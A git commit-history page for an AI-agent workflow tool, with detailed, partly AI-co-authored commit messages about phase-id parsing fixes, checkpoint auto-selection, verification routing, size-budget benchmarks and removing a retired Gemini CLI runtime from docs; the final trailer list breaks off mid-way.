Commit Graph

96 Commits

Author SHA1 Message Date
Tom Boucher
eea9247c93 enhance(#4095): checkpoint:decision auto-selection is opt-in via auto_select (#4912)
* enhance(#4095): checkpoint:decision auto-selection is opt-in via auto_select

Auto-mode used to auto-select a checkpoint:decision's first <option>
unconditionally, making a decision checkpoint's safety depend on option
presentation order rather than an authored choice. Add an optional
auto_select="<option-id>" attribute on the <task> tag: absent, auto-mode
now escalates to a human exactly like gate="blocking-human" does; present,
it names the option auto-mode selects; naming an id with no matching
<option id> is a hard structural-validation error at plan-parse time
rather than a silent fallback to the first option. gate="blocking-human"
continues to win over everything, unchanged.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* fix(#4095): anchor auto_select/id attribute regexes past hyphenated decoys

An isolated adversarial review of the auto_select work found that both new
attribute regexes used \b as their left anchor, which is a word boundary,
not a "start of attribute name" boundary. A decoy attribute ending in the
same word (e.g. data-id="...") sitting before the real id="..." on the
same <option> tag matched first, silently corrupting the extracted option
id. Anchor on (?:^|\s) instead so only the real attribute name can match.
Adds a regression test reproducing the exact decoy-attribute shape, plus a
Unicode option-id test from the same review pass.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* test(#4095): register auto-select-attribute.test.cjs in the docs-guard lane

lint-docs-guard-registration failed: the new test reads docs/reference/
plan-md.md but was not registered, so a future edit to that doc could
silently desync from the test without the guard catching it on the PR
that changed the doc. Registered alongside its direct precedents
(precondition-element.test.cjs, reversibility-tagging.test.cjs), which
read the same file for the same reason.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* fix(#4095): fit the decision bullet under execute-phase.md's frozen byte ceiling

The remote gsd-test run caught what local checks missed: execute-phase.md
carries a frozen ADR-857 Phase-6 byte ceiling (93600) with only 36 bytes
of headroom before this change, and the original checkpoint:decision
wording pushed it to 93772 (over the ceiling). Cascaded into failures in
phase6-capstone-conformance, execute-phase-completion-reconciliation,
claude-orchestration, and the compact-content drift-report test.

Also caught: tests/package-legitimacy-gate.test.cjs anchors a
"decision is conditional, not unconditional" safety check on the literal
phrase "first option" in the decision bullet — which #4095 deliberately
removes, since there is no more unconditional first-option pick. The test
was asserting an assumption this change intentionally makes obsolete;
re-anchored on tokens that still identify the bullet ('decision',
'auto-spawn') without weakening what the test actually verifies (the
bullet must still carry a blocking-human carve-out).

Also fixed a word-order mismatch between my own new test's regex and the
actual doc text it was asserting against (tests/auto-select-attribute.test.cjs).

Regenerated the compact-content benchmark baseline
(tests/fixtures/compact-content-benchmark-baseline.json) to match the new
byte counts.

Emitted-Drift-Ack-Growth: gsd-executor.md — +7 bytes (49138 -> 49145), from the auto_select carve-out added to the checkpoint:decision auto-mode bullet; already trimmed once to fit the 49152 hard cap.
Emitted-Drift-Ack-Growth: execute-phase.md — +12 bytes (93564 -> 93576), from the same carve-out in the orchestrator's decision bullet; kept 24 bytes under the frozen 93600 ADR-857 ceiling after two rounds of trimming for clarity vs. margin.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* chore(#4095): backfill changeset PR number

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Sonnet 5 <noreply@anthropic.com>
2026-09-20 23:47:01 -04:00
0xdhx
8a5166598c fix(#4830): re-land #4768's letter-suffix phase-id fix and its lint-phase-id-drift ratchets on current next (#4873)
* fix(#4830): re-land #4768's letter-suffix phase-id fix and its lint-phase-id-drift ratchets on current next

Commit 740ba0d8a (#4781) removed every change #4768 had merged for #4748:
the first-non-digit split at execute-phase.md's two arithmetic sites, the
init-emitted `padded_phase` the REVIEW.md lookup binds instead of
`printf "%02d"`, the canonical-grammar extractions in autonomous.md and
plan-review-convergence.md, the `.changeset/zesty-wolves-tumble.md`
fragment, and the three lint-phase-id-drift ratchets with their tests.
The guard and the code it guarded left together, so nothing went red.

This is a cherry-pick of 092d9256b onto current `next`, resolved against
the #4683 threat-id fields on execute-phase.md's Parse-JSON line, with the
changeset `pr:` reset to the placeholder and the compact-content benchmark
baseline regenerated against the current base.

(cherry picked from commit 092d9256b8)

Emitted-Drift-Ack-Growth: autonomous.md — restores #4768's canonical-grammar extraction and its explanatory comment for --from/--to/--only
Emitted-Drift-Ack-Growth: execute-phase.md — restores #4768's first-non-digit split at two arithmetic sites and the padded_phase binding for the REVIEW.md lookup
Emitted-Drift-Ack-Growth: plan-review-convergence.md — restores #4768's canonical-grammar phase extraction and its comment
Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01AX7LXxc3uAkGki6iaYiAMP

* chore(#4830): set changeset fragment pr to 4873

---------

Co-authored-by: Claude Fable 5.1 <noreply@anthropic.com>
Co-authored-by: Tom Boucher <trekkie@nomorestars.com>
2026-09-20 00:01:21 -04:00
Tom Boucher
c9a5cc3e12 fix(#4683): detect cross-plan threat-ID duplicates before execution (#4828)
admin_reason: missing-secondary-reviewer — self-authored overnight sweep; two orthogonal agent reviews ran (isolated adversarial REQUEST-CHANGES with all six findings dispositioned, plus a bypass/consumer-lens APPROVE) and the sha-pinned bench passed 46362/0 on the merged head.
2026-09-17 19:06:55 -04:00
Tom Boucher
2bfff17ff8 fix(#4682): route stale verification to the verifier regeneration path (#4818)
* test(#4682): add failing-first coverage for stale verification routing

* fix(#4682): route stale verification to the verifier regeneration path

The stale routing entry sent users to /gsd-verify-work — but verify-work
never rewrites VERIFICATION.md (its only write is the human_needed
canonicalization), so following the advice re-ran UAT, reached the same
stale check, and looped. init's projector and execute-phase's generic
next_command presentation both mirror this entry, so the dead end appeared
on three surfaces.

The stale entry now routes to execute-phase, and execute-phase's
all-plans-complete resume tree gains a stale arm (as a steps/ part, keeping
the spine under its frozen ADR-857 ceiling) mirroring the missing route:
skip cross_ai_delegation/execute_waves/checkpoint_handling, continue at
aggregate_results, and let verify_phase_goal re-dispatch the gsd-verifier —
regenerating VERIFICATION.md and its digest, marked phase or not. The
non-stale fall-through. Staleness detection, the digest format (#4623),
every other routing entry, and the #3684 resume arms are untouched.

Emitted-Drift-Ack-Growth: verify-work.md — stale stop rewritten to dispatch the verifier and re-check (#4682)
Emitted-Drift-Ack-Growth: execute-phase.md — VERIFY_STATUS == stale resume arm added to condition 3 (#4682)

* test(#4682): register the stale-reverification part and align projected commands

The new steps/ part must be registered in the inventory manifest and the
per-runtime golden install trees (regen:derived); the projected stale
next_command is /gsd-execute-phase <phase> (formatGsdSlash prefixes the
runtime surface), the human_needed bare-report probe keeps routing to
verify-work (unchanged semantics), and init-manager's recommended action
follows the new command.

* test(#4682): prefix the remaining stale routing assertions with the runtime surface

Nine stale next_command assertions and the human_needed bare-report probe
still carried the unprefixed or flipped forms from the earlier line-number
edit; all now assert the shipped /gsd-execute-phase <phase> projection,
with the human_needed probe reverted to its unchanged verify-work routing.

* test(#4682): align the last stale projection assertions with the execute-phase route

* docs(#4682): backfill changeset PR number

* test(#4682): refresh the compact-content baseline after the rebase

The rebase onto the #4670 squash brought verify-work.md's bounded
reconciliation text into this branch; the committed compact-content
baseline now reflects the post-rebase split sizes. Local --check is
clean; the previous bench drift (+243) was the baseline, not the diff.

* fix(#4682): carry the response_language directive in the stale-reverification part

The new steps/ part is its own coverage unit for lint-response-language-coverage;
it takes the shared canonical directive line like its sibling execute-phase
parts.

---------

Co-authored-by: sim <sim@local>
2026-09-17 02:23:03 -04:00
Tom Boucher
740ba0d8a3 fix(#4628): expose DAG-ready plans and restrict dispatch to them (#4781)
Emitted-Drift-Ack-Growth: execute-phase.md — #4628 consumer wiring: ready_plans parse pointer, not-ready named skip, and waiting condition 2b reference to the ready-wave-gate step file

Co-authored-by: sim <sim@local>
2026-09-16 02:38:43 -04:00
0xdhx
092d9256b8 fix(#4748): carry a letter-suffixed phase id through the seven shell sites that aborted or truncated it (#4768)
* test(#4748): pin the letter-axis defect at the seven shell sites outside #4660's six

Extends tests/nsegment-phase-grammar.test.cjs one class over: for each of the
seven sites the live shell lines are read off disk by anchor and executed in
bash against a letter-suffixed fixture. The four `$((10#$PHASE_INT))` split
sites must yield PHASE_N without a shell error for `03A` / `12A` / `3A` /
`03A.1.2` and the commit-scope ERE they build must match both `feat(3A-01):`
and `feat(03A-1):`; the review-file lookup must bind init's `padded_phase`
rather than re-pad in shell; the `--from`/`--to`/`--only` and
plan-review-convergence extractions must return `12A` / `23A.1.2` (and
`23.1.2`) whole; the legacy normalizer must pad `3A` to `03A` and must not
mangle an already-padded `08`. Every pre-existing shape (`06`, `08.5`,
`23.1.2`, `36.14`) is a regression control.

tests/init.test.cjs asserts `init execute-phase` emits `padded_phase` for a
directory-backed `03A`, a ROADMAP-only `4B` (→ `04B`), the existing ROADMAP
fallback `1` (→ `01`), and `null` when the phase is not found.

Negative control against the unfixed tree: 41 failures in the grammar file,
exactly the "(fails before the fix)" cases and the three derived from them
(scope ERE, three-flag extraction, the `08` octal trap); 2 in init.test.cjs,
both the new assertions. Every regression control already green.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* fix(#4748): carry a letter-suffixed phase id through the seven shell sites that aborted or truncated it

The canonical phase-number grammar (src/phase-id.cts) is digits, an optional
uppercase letter, then dotted segments — `12A`, `3A`, `23A.1.2` are documented
shapes that `init`, `phase-id.cts` and `phase remove` renumbering already
round-trip. Seven shell sites in shipped workflows and references still
assumed digits-and-dots. Four classes, one fix each:

Class 1 — `PHASE_INT=${PHASE_NUMBER%%.*}; $((10#$PHASE_INT))` (execute-phase.md
×2, completion-reconciliation.md, tdd.md). The post-#4619 split stops at the
first DOT, so on `03A` the "integer" is `03A` and bash aborts with `value too
great for base`. Split at the first NON-DIGIT instead (`%%[!0-9]*`): the
integer half is a pure digit run, and the letter rides along in the rest the
way the dotted fraction already did — `03A.1.2` → PHASE_N `3A\.1\.2`, so the
#4003 zero-pad-tolerant scope ERE matches both `feat(3A-01):` and
`feat(03A-1):`. Byte-identical output for every id that worked before.

Class 2 — `PADDED=$(printf "%02d" "${PHASE_NUMBER}")` before the REVIEW.md
lookup (execute-phase.md). `printf` cannot pad a letter id (prints `03`,
exits 1) — and cannot even re-pad an already-padded `08`, which bash reads as
an invalid octal and prints as `00`, so the lookup resolved phases 08 and 09
to `00-REVIEW.md` today. The disk path hands the workflow the directory's
padded number but the ROADMAP fallback hands it the heading's bare one, which
is why the re-pad existed. `cmdInitExecutePhase` now emits `padded_phase`
through `normalizePhaseName`, exactly as the plan-phase and code-review inits
do, and the workflow binds `{padded_phase}` instead of re-deriving.

Class 3 — `grep -oE '[0-9]+\.?[0-9]*'` (autonomous.md `--from`/`--to`/`--only`,
plan-review-convergence.md). Stops at the letter, so `--from 12A` ran from
phase 12 with no error. Now the canonical ERE `[0-9]+[A-Z]?(\.[0-9]+)*`, which
also closes the single-segment dot-axis gap the same shape carried (`23.1.2`
→ `23.1`, #4568's class in a spelling neither lint saw).

Class 4 — the legacy manual normalizer (phase-argument-parsing.md, reached
from mvp-phase.md). Its two branches (`^[0-9]+$`, `^[0-9]+\.[0-9]+$`) left
`12A` unpadded and never padded `3A` to the `03A` a directory carries; its
integer branch also hit the same `printf` octal trap on `08`. One branch for
the whole canonical token now, padding the digit run via `$((10#…))`.
Whether this legacy surface should instead be retired in favour of `init`'s
normalization is the maintainer call the issue names; extending it keeps the
documented contract true either way.

Driven end to end: `init execute-phase 3A` on a fixture with a
`03A-letter-variant/` directory emits `phase_number: "03A"` and now
`padded_phase: "03A"`; on a ROADMAP-only `### Phase 4B:` it emits `"4B"` /
`"04B"`. The issue's own evidence line claimed `padded_phase` was already in
the execute-phase init output — it was not; that key is emitted by the
code-review / plan-phase inits, which is where the claim was read from.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* chore(#4634): extend lint-phase-id-drift with three ratchets for letter-hostile phase-id consumers

The rules that landed with #4619, #4568 and #4660 police grammar MIRRORS —
regexes that describe a phase id. The #4748 sites are CONSUMERS of one, and
every existing rule reported clean on them: the shell-arithmetic rule's
`_INT` escape trusts a NAME the dot-only split did not earn on `03A`; the
`[0-9]+\.?[0-9]*` shape is neither the bounded form the single-segment rule
bans nor the unbounded form the letterless rule inspects; and nothing looked
at `printf "%02d"` at all. Three narrow additions, one per shape:

- findDotOnlyIntegerSplitDrift — `X_INT=${<phase-var>%%.*}`; the safe split
  is `%%[!0-9]*`. Keys on the SOURCE variable being phase-carrying.
- findLooseDottedPhaseRegexDrift — `[0-9]+\.?[0-9]*` / `\d+\.?\d*` on a
  phase-carrying line; the canonical form is `[0-9]+[A-Z]?(\.[0-9]+)*`.
  Disjoint from the two sibling regex rules by construction.
- findShellPhasePrintfPadDrift — `printf "%0Nd" …` whose arguments name a
  phase-carrying, non-`_INT` variable; a pad of an `_INT` via `$((10#…))`
  and a `{padded_phase}` binding are the sanctioned shapes.

Same `<!-- phase-id-owner: … -->` sanction, same scan roots as their nearest
sibling (shell idioms over workflows + references, the regex shape over
workflows + references + agents), same documented limit of a per-line
textual scan. The post-#4619 comment that described the `_INT` convention
as proven by `%%.*` is corrected to name the digit-run split. Confirmed
against the base commit: each rule fires on exactly its own unfixed sites
(2+1+1, 3+1, 1+1) and zero violations remain on the fixed tree.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* docs(#4748): add Fixed changeset

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* chore(#4748): refresh the compact-content benchmark baseline and acknowledge emitted growth

The three top-level workflow files below grew by the letter-aware split, the
canonical extraction ERE, the `{padded_phase}` binding, and the comment lines
that name the grammar each site now honours. The committed compact-content
benchmark moved with them; refreshed with `benchmark-compact-content.cjs
--write` (aggregate reduction 15.47% -> 15.45%).

Emitted-Drift-Ack-Growth: execute-phase.md — #4748: first-non-digit PHASE_INT split at the plan-selection and TDD-gate sites, `{padded_phase}` binding at the REVIEW.md lookup, and the comments naming why (482 bytes)
Emitted-Drift-Ack-Growth: autonomous.md — #4748: canonical `[0-9]+[A-Z]?(\.[0-9]+)*` at the --from/--to/--only extractions plus one comment naming the grammar (249 bytes)
Emitted-Drift-Ack-Growth: plan-review-convergence.md — #4748: canonical `[0-9]+[A-Z]?(\.[0-9]+)*` at the phase extraction plus one comment naming the grammar (160 bytes)
Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* fix(#4748): name padded_phase in execute-phase.md's init parse list

A `{field}` token inside a workflow bash block is substituted from the init
JSON only for fields the workflow tells the model to parse. `phase_number`
is on that list; `padded_phase` was not, so the `PADDED="{padded_phase}"`
binding at the review lookup would have been a literal — for every phase,
not only letter ones. Found by the pre-file adversarial review (claim 2, the
author's own named suspicion); the test now asserts the parse list carries
the field beside `phase_number`.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* chore(#4634): key the dot-only split rule on its source and widen the printf rule to any %d form

Two false negatives from the pre-file adversarial review of the three #4748
ratchets: `PHASE_PREFIX=${PHASE_NUMBER%%.*}` escaped the split rule because
the destination did not end in `_INT` (the defect is the split, not the
name it lands in), and `printf '%02d'` / `printf "%2d"` escaped the printf
rule because it required double quotes and the zero flag (`%d` cannot parse
a letter id under any width). Both rules now key on the phase-carrying
SOURCE alone; base-site firing counts are unchanged (2+1+1, 1+1) and the
fixed tree stays at zero. The `[[:digit:]]` spelling and the `/phase/i`
heuristic remain the sibling rules' documented limits.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* chore(#4748): refresh the compact-content benchmark baseline after the parse-list edit

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* test(#4748): compose init's emitted padded_phase through the live REVIEW.md lookup

The Class 2 site is a `{padded_phase}` template token, which no test can
execute as written. This substitutes the value init emits
(`normalizePhaseName`) into the three live lookup lines and runs them
against a fixture, so the emitted value, the binding, the path construction
and the status extraction are exercised together — `03A-REVIEW.md` and
`08-REVIEW.md` each resolve to their own status. Suggested by the resumed
adversarial review pass (claim C).

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* test(#4748): move the #4619 and #4003 source-parity pins to the letter-safe split

tests/execute-phase-decimal-arithmetic.test.cjs and
tests/safe-resume-gate-anchoring.test.cjs pin the four Class 1 sites'
snippet byte-for-byte, so the first-non-digit split reddened both in the
whole-suite run (scripts/ci-test-scope.cjs does not select either file for
a workflow edit — the scoped run was green). The pinned snippet is now the
shipped one, and the behavioural half of the #4619 file gains the letter
case (`03A` → `3A`, `23A.1.2` → `23A\.1\.2`) beside its decimal cases.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* chore(#4634): key the dot-only split rule on the _INT destination again, tolerating the quoted spelling

Keying on the source alone (the previous commit's widening, from a review
probe) flags `PARENT_PHASE="${PHASE_NUMBER%%.*}"` in
gap-closure-artifacts.md — a correct derivation that wants everything
before the first dot, letter included. The defect this rule polices is a
dot split INTO the name the shell-arithmetic rule trusts as an integer, so
`_INT` is the discriminator on purpose; the quoted spelling that site uses
is now tolerated so the same shape into an `_INT` cannot hide behind it.
Base-site firing unchanged (2+1+1), zero on the fixed tree, and the
parent-phase line is pinned as a silent case.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* test(#4748): use t.after() for the composition test's fixture cleanup

CONTRIBUTING forbids try/finally inside a test body; the per-test cleanup
form is `t.after(() => cleanup(dir))`. Flagged by the filing driver's
test-ruleset gate before the PR was created.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

* chore(#4748): set changeset fragment pr to 4768

* chore(#4748): refresh the compact-content benchmark baseline after rebasing onto next

Regenerated with `node scripts/benchmark-compact-content.cjs --write` on the
rebased tree (base 0d6bf19bf); `--check` confirms it matches the live recompute.
Only the execute-phase split and the aggregate totals differ from next's copy.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_017cjzdZtYjcBAa3Lqh2VrLK

---------

Co-authored-by: Claude Fable 5.1 <noreply@anthropic.com>
Co-authored-by: Tom Boucher <trekkie@nomorestars.com>
2026-09-15 23:31:36 -04:00
Tom Boucher
eb49ff98df fix(#4728): stop presenting the retired Gemini CLI as a supported runtime (#4743)
* fix(#4728): stop presenting the retired Gemini CLI as a supported runtime

#1928 removed the Gemini CLI runtime after Google sunset it on 2026-06-18, and
updated the ENGLISH docs. The locale mirrors and the runtime-loaded workflow
prose were not updated in the same change, and no gate asserts the ABSENCE of a
retired runtime, so both drifted quietly for a year.

The finding that shaped this change: English is already correct. docs/
ARCHITECTURE.md, CONFIGURATION.md, USER-GUIDE.md, how-to/install-on-your-runtime.md
and CLI-TOOLS.md carry zero runtime-axis Gemini references; the only English hits
anywhere are a Gemini 2.5 Pro MODEL line, the GEMINI_API_KEY row, and prose that
correctly documents the retirement. So the docs half of this is translation lag,
not a content decision, and every locale edit here is parity with an existing
English line rather than new wording:

  - install-on-your-runtime.md  English has NO `### Gemini CLI` section  -> deleted
  - USER-GUIDE.md :843          "…, Antigravity CLI, Kilo)"              -> substituted
  - ARCHITECTURE.md             English has NO Gemini CLI table row      -> row deleted
  - ARCHITECTURE.md :24         English holds `Kimi CLI` in that slot    -> Kimi CLI
  - context-monitor.md :3       "`AfterTool` for Antigravity CLI"        -> substituted
  - spike-and-sketch.md :93     "(Codex, Antigravity CLI, etc.)"         -> substituted
  - configure-model-profiles    "Codex, OpenCode, Antigravity CLI, or Kilo" -> substituted
  - COMMANDS.md                 English keeps only hyphen + Codex bullets -> colon bullet deleted
  - FEATURES.md                 source docs/features/multi-runtime-support.md:10
                                lists no Gemini CLI                       -> name removed

ARCHITECTURE.md:24 is the clearest case for reading English rather than
substituting blind: Antigravity ALREADY appears later in that list, so replacing
Gemini CLI with Antigravity would have named it twice. English holds Kimi CLI
there, so that is what the locales get.

The largest single class was hand-duplicated boilerplate. A "Text mode" paragraph
repeated across 34 runtime-loaded workflow files ends "…required for non-Claude
runtimes (OpenAI Codex, Gemini CLI, etc.)". No lint enforces that sentence and no
script syncs it, so every copy was edited. These files are read by the agent at
runtime, so they steer behavior rather than only informing a reader — which is why
this class matters more than its word count suggests.

The slash-command-form section is restructured in all four languages to match
English, which had already dropped its colon-form bullet. That bullet claimed the
colon form is "Gemini CLI only", which was false on its own terms independent of
the retirement: `/gsd:…` is GSD's canonical AUTHORING token, rewritten per runtime
at install time, and NO runtime registers it — VALID_COMMAND_STYLES is
{slash-hyphen, shell-var} and 18 of 19 runtimes declare slash-hyphen. Substituting
the runtime name would have left the claim false with Antigravity's name in it, so
the claim is gone, matching English.

Two anchor regressions were caught and fixed while doing that. zh-CN lost its
explicit {#slash-command-forms-hyphen-vs-colon} anchor while its TOC still linked
it; the anchor is restored. ko-KR and pt-BR never had an explicit anchor and rely
on the slug generated from the heading text, so shortening the heading broke their
own TOC links; those links now point at the new slugs. English's heading lost its
anchor while its TOC still links the old one — that latent English bug is
deliberately NOT copied.

Preserved, because `gemini` is not one thing here and a blanket sweep breaks the
product: ~/.gemini/antigravity{,-ide,-cli} and ~/.gemini as their parent;
~/.gemini/config (#3738); GEMINI.md; hookEvents "gemini"; GEMINI_API_KEY in all
four locales; every gemini-* model id and the Gemini 2.5 Pro references in
ko-KR/pt-BR/zh-CN (ja-JP genuinely lacks that line — the locales have diverged, so
a uniform patch would be wrong); the hook-event dialect notes, which are
RE-ATTRIBUTED rather than deleted because Antigravity inherits that dialect;
reapply-patches.md:93's legacy-install note; host-integration-capability-matrix.md
:27 and :342, which correctly record the sunset and Antigravity's contract;
whats-new-1.7.0.md and FEATURES.md:3506, which document the retirement itself; and
the generated launcher preamble, which belongs to epic #4632 — zero
_GSD_SHIM_NAME lines appear in this diff.

Coverage: a #4728 block in tests/gemini-runtime-removed.test.cjs asserts the
retired name is gone from STRUCTURAL POSITIONS (a level-3 heading, a table row's
first cell, a runtime-example parenthetical) rather than asserting the string is
absent, which would be wrong. It pairs those with positive PRESERVE assertions
over the same files — Antigravity's heading, ~/.gemini/antigravity, GEMINI_API_KEY,
AfterTool — so a patch that deletes too much fails as loudly as one that deletes
too little. The model-axis test pins both the presence in three locales and the
absence in ja-JP, so a later uniform patch that "helpfully" adds it back fails.
The new docs/ reads tripped lint-docs-guard-registration for the first time in
this file, so the test is registered in scripts/docs-guard-registry.cjs.

Not covered here, by design: nothing above would catch a Gemini-as-runtime
reference appearing in a NEW file tomorrow. That is the repo-wide drift guard,
#4729, which must land last — written now it would red on the very references this
change removes.

Fixes #4728

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#4728): fix four review blockers, including a vacuous test and my own duplicate

A full matrix run on 31f12d7943 FAILED with 3 real failures, and an isolated
adversarial review returned BLOCK on four blockers. All of it was correct.

1. I committed the exact error I claimed to have avoided. The commit message
   boasted that ARCHITECTURE.md:24 proved the value of reading English rather
   than substituting blind, because Antigravity already appeared later in that
   list. Five hundred lines further down the SAME four files, my
   `Gemini:` -> `Antigravity:` substitution produced TWO consecutive
   `- Antigravity:` bullets, because an Antigravity bullet was already there.
   English (ARCHITECTURE.md:827) merges them into one. Now merged in all four
   locales, reusing each locale's existing words.

2. `--gemini` survived in the runtime-detection CLI flag list in all four
   locale ARCHITECTURE.md files. English:817 holds `--kimi` in that slot and
   already lists `--antigravity` later, so this is another place where
   substituting Antigravity would have duplicated it. Now `--kimi`.

3. Two runtime-loaded workflow files still enumerated Gemini one line ABOVE the
   line I had already corrected -- the "Adaptive (Recommended)" option in
   settings.md:192 and new-project/steps/auto-mode-config.md:95.

4. THE NEW TEST WAS VACUOUS for two of its five files. It matched only
   `non-Claude runtimes (` and `(e.g. `, and neither regex could reach the two
   lines the change actually fixed: health.md:52 reads `non-Claude (Codex, ...)`
   without the word "runtimes", and execute-phase.md:1028 has no parenthetical
   at all. The reviewer proved it by re-introducing Gemini at both lines and
   watching the assertion stay GREEN. That same blind spot is what hid finding 3.

   Replaced with a case-sensitive `/\bGemini\b/` walk over every
   `gsd-core/workflows/**/*.md`, which works because every LEGITIMATE gemini
   reference in that tree is spelled differently and cannot match: Antigravity's
   paths are lowercase with a slash (`~/.gemini/antigravity`), Google's model ids
   are lowercase and hyphenated (`gemini-3.1-pro-preview`), and the env vars are
   uppercase (`GEMINI_CONFIG_DIR`, `GEMINI_SESSION_ID`). A bare capitalised
   `Gemini` there means the retired RUNTIME is being named. The walk asserts it
   found at least 50 files so an empty walk cannot pass vacuously, and it now
   covers the nested `new-project/steps/` directory where finding 3 lived.

   Two allowlist entries, both by line CONTENT and both justified:
   reapply-patches.md's `Legacy: ... pre-#1928` note, and settings-advanced.md's
   `Known provider` menu. The second was escalated by the agent rather than
   decided: Section 8 of that file says model policy is defined "independently"
   of the runtime, so `(Claude / OpenAI / Gemini / Qwen)` is the PROVIDER axis --
   the same axis as the lowercase model ids -- and must keep working.

   Proven to fail, not just asserted: the predicate reports 0 offenders on the
   real tree and exactly 2 on a /tmp copy with Gemini re-injected at
   health.md:52 and execute-phase.md:1028.

Also from the review: a `| Gemini |` COLUMN survived in the locale FEATURES.md
comparison tables (English has none) -- removed from all three, with header,
separator and every body row kept aligned; two ENGLISH runtime-axis sites were
missed by my own parity standard (how-to/execute-a-phase.md:88 and
how-to/verify-and-ship.md:89, the latter doubly stale since #4716 retired the
Gemini reviewer lane); docs/USER-GUIDE.md:12 linked a dead anchor, which I had
found and deliberately left -- record-and-proceed on a known defect is exactly
what the rules forbid, so it is fixed; docs/COMMANDS.md:12 and all four mirrors
still claimed "the hyphen and colon forms are runtime-specific spellings" with
no colon form documented anywhere, so that false sentence is deleted; and ko-KR
had the installer rather than the user doing the targeting.

The other two matrix failures were the compact-content benchmark baseline, which
drifted because this PR changes byte counts, refreshed via the script's own
`--write` path rather than by hand; and this commit's emitted-drift-ack trailers.

Method note on the acks: the failing run measured growth against
origin/next@1110c3b4ee, which is the STALE LOCAL `next` ref -- gsd-test merges
into the local base branch, and this machine's `next` is seven commits behind
origin/next, which is checked out in the main worktree and so cannot be
fast-forwarded from here. The 32 trailers below are computed against the REAL
base (origin/next @ ca8d9d4459) by comparing each tracked file's blob size, which
is one more file than that run reported -- the extra is settings.md, grown again
by fix 3. docs-update.md and map-codebase.md are deliberately NOT acked: they
SHRANK, since there the fix deleted ", Gemini CLI" rather than substituting, and
acking a file no delta consumed is itself an error.

Refs #4728

Emitted-Drift-Ack-Growth: add-tests.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: add-todo.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: ai-integration-phase.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: check-todos.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: cleanup.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: complete-milestone.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: do.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: eval-review.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: execute-phase.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: execute-plan.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: health.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: import.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: inbox.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: manager.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: new-milestone.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: new-workspace.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: note.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: onboard.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: plant-seed.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: profile-user.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: quick.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: remove-workspace.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: secure-phase.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: settings.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
